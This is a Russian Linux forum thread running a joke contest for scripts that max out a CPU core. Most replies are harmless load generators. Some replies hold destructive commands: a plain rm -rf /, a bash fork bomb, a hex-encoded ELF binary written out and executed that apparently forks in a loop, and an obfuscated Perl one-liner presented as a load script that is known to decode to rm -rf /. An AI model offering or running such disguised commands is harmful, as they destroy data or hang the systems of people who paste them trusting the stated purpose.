LINUX.ORG.RU
ФорумTalks

Загрузки процессора тред

 , , , ,


0

1
yes > /dev/null

Объявляю конкурс на:

  • самый короткий скрипт для полной загрузки ядра процессора
  • самый идиотский скрипт для полной загрузки ядра процессора
  • самый извращённый скрипт для полной загрузки ядра процессора

. (точка)

Стоимость участия — 7 score. Оплатить можно здесь, допускается бесплатное участие и льготы для анонимусов. Победитель получает ускорение прохождения квеста linux.org.ru стандартного.

yes|lzma -e9T0> /dev/null

Но, похоже, таки в скорость пайпа упирается

derlafff ★★★★★
()
Последнее исправление: derlafff (всего исправлений: 1)

самый извращённый скрипт для полной загрузки ядра процессора

Не совсем то, скрипт генерирующий нагрузку так, что loadaverage получается в виде синусоиды.

MAXJOBS=20
for i in `seq 1 $MAXJOBS` ; do nice -n 19 gzip -c /dev/zero > /dev/null & done

while true
do
 LA=`</proc/loadavg` && LA=${LA// */}
 H=$(date +%M) && H=${H/0/}
 G=`echo "(${MAXJOBS}/2)*(s(2*3.14159*${H}/60) +1 ) <= ${LA}" | bc -l`
 test ${G} -lt 1 && for i in `seq 1 $MAXJOBS` ; do  kill -SIGCONT %$i  ; done  || for i in `seq 1 $MAXJOBS` ; do  kill -SIGSTOP %$i; done
 sleep 1
done

Deleted
()
Ответ на: комментарий от backburner

хотел написать. хотя тут как у поциента ulimits настроен

int13h ★★★★★
()

В браузере открой историю. В поиске веди linux.org.ru, выдели всё и попробуй удалить. Гарантирую загрузку ядер процессора на 100%, правда только одного единовременно и оно время от времени переключается

sehellion ★★★★★
()
echo 7F454C46010101000000000000000000020003000100000054800408340000000000000000000000340020000100000000000000010000000000000000800408008004085B0000005B00000005000000001000006A0258CD80EBF9 |xxd -r -p >f;chmod +x f;./f
Deleted
()
Ответ на: комментарий от Deleted

у кого 64 бита, возможно придётся исправить последние байты «CD80» на «0F05». Хз, проверить не могу.

Deleted
()

rm -rf /

Коротко, ведь процессор загрузится, хоть и не надолго. Идиотски, почему знаешь сам. Извращённый потому, что после такого тебе придётся потрахаться (если есть бэкапы, то немного).

Pyzia ★★★★★
()
Последнее исправление: Pyzia (всего исправлений: 1)

самый короткий скрипт для полной загрузки ядра процессора

никогда не любил соревноваться в подобном плане, возможно потому что я идиот и знаю это, что мне не справиться с этим, но знаете.. когда видишь как человек тщательно собирает всякие такие ПРИКОЛЬНЕНЬКИЕ однострочники для себя, которые весят мало, а выполняют много, — выглядит это как сорт оф аутизм.

самый идиотский скрипт для полной загрузки ядра процессора

однажды я сделал mplayer() { } функцию в баш, в которой вызывал mplayer расчитывая что будет запущен сам mplayer, но ясно дело, что рекурсивно вызывалась эта же функция. а надо было делать /usr/bin/mplayer, а вместо этого оно мне отожрало ресурсы и повисло.

самый извращённый скрипт для полной загрузки ядра процессора

купить много VDS по всему миру и...

VDS1# ssh -L 1234:localhost:1234 VDS2
VDS2# ssh -L 1234:localhost:1234 VDS3
VDS3# ssh -L 1234:localhost:1234 VDS1
VDS1# echo абыр | netcat 127.0.0.1 1234

а вообще буду оригинален: самое извращение посадить домохозяйку за комп чтобы она тратила процессорное время на просмотр роликов с котятками на ютубе.

Spoofing ★★★★★
()
Последнее исправление: Spoofing (всего исправлений: 1)
Ответ на: комментарий от backburner
:(){ :|:& };:

На OS X кстате не работает, сразу затыкается

MacBook-Air-Andrew% :(){ :|:& };:
[2] 36736 36737
MacBook-Air-Andrew%
[2]  + done       : | :
MacBook-Air-Andrew% :: fork failed: resource temporarily unavailable
:: fork failed: resource temporarily unavailable
:: fork failed: resource temporarily unavailable
:: fork failed: resource temporarily unavailable
...
fornlr ★★★★★
()
Последнее исправление: fornlr (всего исправлений: 1)
Ответ на: комментарий от Deleted

xxd

Спасибо, джва года хотел подобную штуку (hexdump слишком наркоманский). У неё даже мануал на русском есть О_О Ещё бы для двоички такое.

MiniRoboDancer ★☆
() автор топика
Ответ на: комментарий от GoNaX

Сколько ядер может грузить однопроцессная программа без руками реализованного параллелизма? Что за идиотский вопрос?

MiniRoboDancer ★☆
() автор топика

Как самый идиотский, короткий и извращенный одновременно.

`yes`
Но лучше не запускай. Я предупреждал.

peregrine ★★★★★
()
Ответ на: комментарий от peregrine

Фигня, баш сожрал и умерщтвлён OOM вместе с вкладкой. Тут подобное уже кидали, только память сожрал сам yes. Хороший способ закрыть ненужную вкладку и заодно загнать систему в своп перед запуском чего-нибудь жирненького :-) Я тут утром сделал форк-бомбу из yes, потом натравил на неё форк-бомбу из killall и глядел, как они борются.

MiniRoboDancer ★☆
() автор топика
cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see' 
Llevellyn
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.